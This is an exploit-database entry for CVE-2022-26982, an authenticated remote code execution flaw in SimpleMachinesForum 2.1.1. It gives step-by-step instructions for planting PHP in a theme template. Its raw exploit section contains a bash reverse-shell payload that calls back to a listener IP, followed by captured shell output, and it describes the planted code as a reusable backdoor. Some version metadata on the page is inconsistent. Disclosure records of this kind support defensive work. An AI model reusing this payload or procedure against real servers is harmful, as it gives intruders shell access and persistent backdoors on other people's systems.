SimpleMachinesForum v2.1.1 - Authenticated Remote Code Execution

vendor:

SimpleMachinesForum

by:

Sarang Tumne @CyberInsane

7.2

CVSS

HIGH

Authenticated Remote Code Execution

CWE

Product Name: SimpleMachinesForum

Affected Version From: 2.1.2001

Affected Version To: 2.1.2001

Patch Exists: YES

Related CWE: CVE-2022-26982

CPE: 2.1.2001

Metasploit:

Other Scripts:

Platforms Tested:

2022

SimpleMachinesForum v2.1.1 – Authenticated Remote Code Execution

An authenticated remote code execution vulnerability exists in SimpleMachinesForum v2.1.1. An attacker can exploit this vulnerability by logging in with admin credentials, navigating to the Admin=>Main=>Administration Center=>Configuration=>Themes and Layout=>Modify Themes=>Browse the templates and files in this theme.=>Admin.template.php page, and inserting a vulnerable php code. The attacker can then execute the code without any valid login as it is not required. This can be used as a backdoor.

Mitigation:

The vendor has released a patch to address this vulnerability.

Source

Exploit-DB raw data:

# Exploit Title: SimpleMachinesForum v2.1.1 - Authenticated Remote Code Execution 
# Exploit Author: Sarang Tumne @CyberInsane (Twitter: @thecyberinsane)
# Date: 7th March 2022
# CVE ID: CVE-2022-26982
# Confirmed on release 2.1.1
# Vendor: https://download.simplemachines.org/
# Note- Once we insert the vulnerable php code, we can even execute it without any valid login as it is not required! We can use it as a backdoor!

###############################################
#Step1- Login with Admin Credentials
#Step2- Goto Admin=>Main=>Administration Center=>Configuration=>Themes and Layout=>Modify Themes=>Browse the templates and files in this theme.=>Admin.template.php
#Step3- Now add the vulnerable php reverse tcp web shell exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.56.1/4477 0>&1'"); ?>
#Step4- Now Goto Add Media=>Add Resource=> Upload php web shell and click on SAVE CHANGES at the bottom of the page
#Step5- Now click on "Themes and Layout" and you will get the reverse shell:
E.g: Visit http://IP_ADDR/index.php?action=admin;area=theme;b4c2510f=bc6cde24d794569356b81afc98ede2c2 and get the reverse shell:

listening on [any] 4477 ...
connect to [192.168.56.1] from (UNKNOWN) [192.168.56.130] 41276
bash: cannot set terminal process group (1334): Inappropriate ioctl for device
bash: no job control in this shell
daemon@debian:/opt/bitnami/simplemachinesforum$ whoami
whoami
daemon
daemon@debian:/opt/bitnami/simplemachinesforum$ id
id
uid=1(daemon) gid=1(daemon) groups=1(daemon)
daemon@debian:/opt/bitnami/simplemachinesforum$